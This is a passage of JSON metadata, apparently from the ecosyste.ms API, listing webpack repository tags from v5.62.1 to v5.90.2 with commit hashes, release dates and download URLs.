/repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webp